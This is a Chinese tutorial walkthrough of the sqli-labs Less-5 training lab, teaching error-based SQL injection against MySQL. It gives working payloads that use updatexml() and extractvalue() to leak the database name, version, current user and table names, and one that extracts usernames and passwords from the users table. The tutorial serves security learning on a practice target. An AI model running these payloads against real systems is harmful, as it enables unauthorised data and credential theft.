sqli—labs第五关——报错注入
一:判断输入类型
首先测试 ?id=1
回显You are in...
渐进测试?id=1'
报错分析:
出现引号提示——“”,可能是字符型
继续测试?id=1'--+(用注释符修复了语法错误)
回显You are in...
说明就是字符型
因为能用注释符修复单引号导致的错误 → 证明原始SQL有单引号 → 就是字符型注入
所以注入类型为字符型,单引号闭合
二:.判断有几列
?id=1'order by 3--+ //页面回显you are in...
?id=1'order by 4--+ //报错如下
三:报错注入
介绍两个核心报错函数:
1.updatexml()函数
updatexml(XML文档, XPath路径, 新值)XML是标记语言,类似html但更通用,XPath是XML的查询语言,就像SQL用于查询数据库,XPath用于在XML文档中查找信息
我们通过故意制造错误,让第二个参数XPath不合法,从而在报错信息里面得到我们想要的数据
举个栗子~在这一关里面,我们输入如下
?id=-1' and updatexml(1,concat(0x7e,database()),1)--+ps:0x7e是ASCll字符中~(波浪号)的表示
select database() 执行:返回当前的数据库名security
concat(07xe,(select databased()))执行:就是~security,便于观察
MySQL尝试将~security 作为XPath路径 → 语法错误!产生报错XPATH syntax error: '~security'
得到数据库名:security
但是我们再updatexml查询表中数据的时候,会出现查询数据不完整的情况,这时候可以用两个子句
(1):LIMIT子句——控制数据提取
当报错注入只能显示部分数据时(通常小于32个字符),用LIMIT分批次获取:
例如:
# 获取第一个表名
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
),1)--+# 获取第二个表名
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)
),1)--+limit的第一个参数是起始位置,从0开始,第二个参数是每次取几条记录
(2):group concat()函数+substr:合并多行数据
示例:
-- 第一次获取前30个字符
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name separator '|')from information_schema.tableswhere table_schema=database(),1,30)),1
)--+-- 第二次获取31-60字符
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name separator '|')from information_schema.tableswhere table_schema=database(),31,30)),1
)--+2.extractvalue()函数
?id=-1' and extractvalue(XML文档, XPath路径)同上:XPath路径是关键攻击点,通过故意构造非法XPath路径,使得报错信息中包含我们所需要的信息
拿数据库版本和当前用户举例子
# 获取数据库版本
?id=1' and extractvalue(1,concat(0x7e,version()))--+# 获取当前用户
?id=1' and extractvalue(1,concat(0x7e,user()))--+
获取数据库表名:
第一次输入:
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,32)),1)--+第二次输入(如果第一次结果不完整):
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),33,32)),1)--+
获取users表的数据
?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,%27:%27,password)%20from%20users%20limit%200,1)),1)%20--+❀❀❀ 完结撒花!! ❀❀❀
相关文章:
sqli—labs第五关——报错注入
一:判断输入类型 首先测试 ?id1 回显You are in... 渐进测试?id1 报错分析: 出现引号提示——“”,可能是字符型 继续测试?id1--(用注释符修复了语法错误) 回显You are in... 说明就是字符型 因为能用注释符…...
从海洋生物找灵感:造个机器人RoboPteropod,它能在水下干啥?
大家好!在如今人类对水下环境探索不断深入的时代,从水下考古到珊瑚礁考察,各种任务都离不开水下机器人的助力。但传统水下机器人尺寸较大,在狭窄的水下空间施展不开。今天,我们就来认识一款受海洋小生物启发而设计的仿…...
FastAPI系列16:从API文档到TypeScript 前端客户端(SDKs)
从API文档到TypeScript 前端客户端(SDKs) 快速入门生成一个TypeScript 客户端测试生成的TypeScript 客户端 API标签与客户端生成生成带有标签的 TypeScript 客户端 自定义Operation ID使用自定义Operation ID生成TypeScript客户端 在 FastAPI系列15&…...
为什么 Redis 设计为单线程?6.0 版本为何引入多线程?
Redis 6.0引入多线程的核心目的是优化网络I/O处理,通过分离I/O操作与命令执行,在保持数据一致性的前提下,充分利用多核CPU资源提升高并发场景下的性能,同时保持向后兼容性。以下是对Redis单线程设计与6.0版本引入多线程的详细解析…...
C# 使用HttpClient下载文件
本章讲述:如何在C#中使用HttpClient直接从阿里云OSS下载文件。 步骤1: 添加必要的命名空间 using System; using System.IO; using System.Net.Http; 步骤2: 创建下载方法 以下是使用HttpClient下载文件的示例代码: public class OssDownloader {//d…...
CS016-2-unity ecs
目录 【23】射击改进 【24】僵尸生成器 编辑【25】随机行走 【27】射击光效 【23】射击改进 a. 当距离目标太远的时候,要继续移动。而当距离目标到达攻击距离之后,则停止移动。 上图中的if:判断自身和目标的距离是否大于攻击距离&#…...
CST软件对OPERACST软件联合仿真汽车无线充电站对人体的影响
上海又收紧了新能源车的免费上牌政策。所以年前一些伙伴和我探讨过买新能源汽车的问题,小伙伴们基本纠结的点是买插电还是纯电?我个人是很抗拒新能源车的,也开过坐过。个人有几个观点: 溢价过高,不保值。实际并不环保…...
华为2024年报:鸿蒙生态正在取得历史性突破
华为于2025年03月31日发布2024年年度报告。报告显示,华为经营结果符合预期,实现全球销售收入 8,621 亿元人民币,净利润 626 亿元人民币。2024 年研发投入达到 1,797 亿元人民币,约占全年收入的 20.8%,近十年累计投入的…...
策略模式-枚举实现
策略模式的实现方法有很多,可以通过策略类if,else实现。下面是用枚举类实现策略模式的方法。 定义一个枚举类,枚举类有抽象方法,每个枚举都实现抽象方法。这个策略,实现方法是工具类的很实现,代码简单好理解 枚举实现…...
C++中多重继承下的虚表结构
在 C 的多重继承 中,虚表(vtable)结构会变得更加复杂。 一、基础回顾:单继承下的虚表结构 类中含有虚函数 → 编译器生成虚表(每类一张);每个对象有一个隐藏的虚表指针(vptr&#x…...
LabVIEW的CAN通讯测试程序
该程序是基于 NI LabVIEW 平台开发的 CAN(Controller Area Network,控制器局域网)通讯测试程序。主要功能是对 CAN 通讯过程进行模拟、数据传输与验证,确保 CAN 通讯的正常运行和数据的准确传输。 程序详细说明 接口选择ÿ…...
Spring Boot 使用Itext绘制并导出PDF
最终效果 其实可以加分页,但是没有那么精细的需求,所以我最后就没有加,有兴趣的可以尝试下。 项目依赖 <!-- Spring Boot 版本有点老 --> <spring-boot.version>2.3.12.RELEASE</spring-boot.version><!-- 依…...
全部被“重置连接”或超时)
访问 Docker 官方镜像源(包括代理)全部被“重置连接”或超时
华为云轻量应用服务器(Ubuntu 系统) 遇到的问题是: 🔒 访问 Docker 官方镜像源(包括代理)全部被“重置连接”或超时了,说明你这台服务器的出境网络对这些国外域名限制很严格,常见于华…...
)
RPC框架源码分析学习(二)
RPC框架源码分析与原理解读 前言 在分布式系统开发中,远程过程调用(RPC)是一项基础且关键的技术。通过对KVstorageBaseRaft-cpp项目RPC模块的源码分析,我深入理解了RPC框架的工作原理和实现细节。本文将从程序员视角分享我的学习心得。 框架概述 本项…...
【测试】BUG
目录 1、描述BUG的要素: 2、BUG的级别 3、BUG的状态的流转 4、与开发产⽣争执怎么办(⾼频考题) 什么是BUG??? 程序与规格说明之间的不匹配才是错误 1、描述BUG的要素: 问题出现的版本、问…...
MongoClient和AsyncIOMotorClient的区别和用法
示例代码: from motor.motor_asyncio import AsyncIOMotorClient from pymongo import MongoClient🔍 这两个库分别是: 名字说明举个例子pymongo.MongoClient同步版 的 MongoDB 客户端(常规阻塞式操作)你在主线程里一…...
Mac 环境下 JDK 版本切换全指南
概要 在 macOS 上安装了多个 JDK 后,可以通过系统自带的 /usr/libexec/java_home 工具来查询并切换不同版本的 Java。只需在终端中执行 /usr/libexec/java_home -V 列出所有已安装的 JDK,然后将你想使用的版本路径赋值给环境变量 JAVA_HOME,…...
Pillow 移除或更改了 FreeTypeFont.getsize() 方法
w, h self.font.getsize(label) # text width, height AttributeError: FreeTypeFont object has no attribute getsize 在Pillow 项目的变更日志里可以查到哪个版本移除了 getsize() 方法,Pillow仓库: Releases python-pillow/Pillow GitHub 因为…...
数据结构中链表的含义与link
在数据结构中,链表是一种常见的数据结构,它由一组节点组成,每个节点包含两部分:数据部分和指针部分。指针部分用于指向下一个节点的地址。这种结构允许高效的插入和删除操作。 链表的节点表示 链表节点的基本结构可以用以下伪代码表示: Node {data // 存储的数据next /…...
视频编辑软件无限音频、视频、图文轨
威力导演APP的特色功能包括无限音频、视频、图文轨,以及上百种二/三维特技转场、音/视频滤镜和多种音视频混编输出。此外,它还支持实时高清HDV格式、模拟信号输出,并具有DV25、DVACM、DV、HDV输入和输出等功能。在视频编辑领域,威…...
)
NVMe-oF(NVMe over Fabrics)
技术背景与定义 传统存储协议(如iSCSI、FC)无法发挥NVMe SSD性能(如延迟<100μs、IOPS>100万)。NVMe-oF(NVMe over Fabrics)由NVM Express组织于2016年发布,将NVMe协议从本地访问扩展到了…...
uniapp-商城-53-后台 商家信息(更新修改和深浅copy)
1、概述 文章主要讨论了在数据库管理中如何处理用户上传和修改商家信息的问题,特别是通过深浅拷贝技术来确保数据更新的准确性和安全性。 首先,解释了深拷贝和浅拷贝的区别:浅拷贝使得两个变量共享相同的内存地址,而深拷贝则创建新…...
配置 Spark 以 YARN 模式
以下是配置 Spark 以 YARN 模式运行的详细步骤: 环境准备 安装 JDK:所有节点需安装 JDK 1.8 或以上版本,并配置环境变量,确保 JAVA_HOME 正确指向安装路径。安装 Hadoop:安装 Hadoop(推荐 3.x 版本&#…...
[Java实战]Spring Boot 整合 Thymeleaf (十)
[Java实战]Spring Boot 整合 Thymeleaf (十) 引言 在 Java Web 开发领域,Thymeleaf 以其自然模板、无缝 Spring 集成和强大的表达式引擎脱颖而出,成为 Spring Boot 官方推荐的模板引擎。本文将深度解析 Spring Boot 与 Thymelea…...
NGINX 开源与社区动态:从基石到浪潮,持续演进的生态力量
NGINX 之所以能够成为全球应用最为广泛的 Web 服务器和反向代理软件之一,其成功的核心驱动力无疑是开源。开放的源代码、活跃的社区参与以及透明的开发过程,共同铸就了 NGINX 的辉煌。然而,正如所有大型开源项目一样,NGINX 的开源之路也并非一帆风顺,其社区动态也时常涌现…...
监控易一体化运维:网络流量分析的智慧引擎
在数字化时代,企业运营与网络紧密相连,网络性能的优劣直接影响企业的发展步伐。网络流量管理在企业网络运维中占据非常关键的地位。监控易一体化运维管理软件,凭借其强大的网络流量分析功能,为企业网络的稳定高效运行提供了有力保…...
IDEA+git将分支合并到主分支、IDEA合并分支
文章目录 一、合并分支二、可能遇到的问题2.1、代码冲突 开发过程中我们可能在开发分支(dev)中进行开发,等上线后将代码合并到主分支(master)中,本文讲解如何在IDEA中将dev分支的代码合并到master分支中。 一、合并分支 功能说明:将dev分支的…...
)
QML学习01(设置宽度、高度、坐标点、标题,信号与槽,键盘事件)
QML学习 1、前言2、QML3、QML和QWidget的区别3、QtQuick下的Windows应用4、总结 1、前言 记录一下QML学习的过程,方便自己日后回顾,也可以给有需要的人提供帮助。 2、QML QML是 Qt 框架中的一种声明式编程语言,专门用于快速设计和开发用户…...
uniapp+vue3中自动导入ref等依赖
前言: 在我们使用uni-appvue3创建项目,开发的过程中,老是需要导入我们的ref、onshow等,那么能不能自动导入,不用我们每个页面都写呢?是没问题的,这里让他的小帮手来帮你减轻负担:他就…...
【.net core】.net core 6.0添加WCF服务引用
在 .NET Core 6.0 (.NET 6) 中,调用 WCF 服务 是完全支持的,只要服务使用的是 basicHttpBinding 或类似 HTTP 协议的绑定(如 wsHttpBinding,但不推荐) .NET Core不支持 net.tcp,只能用http形式。 .net core调用WCF服务…...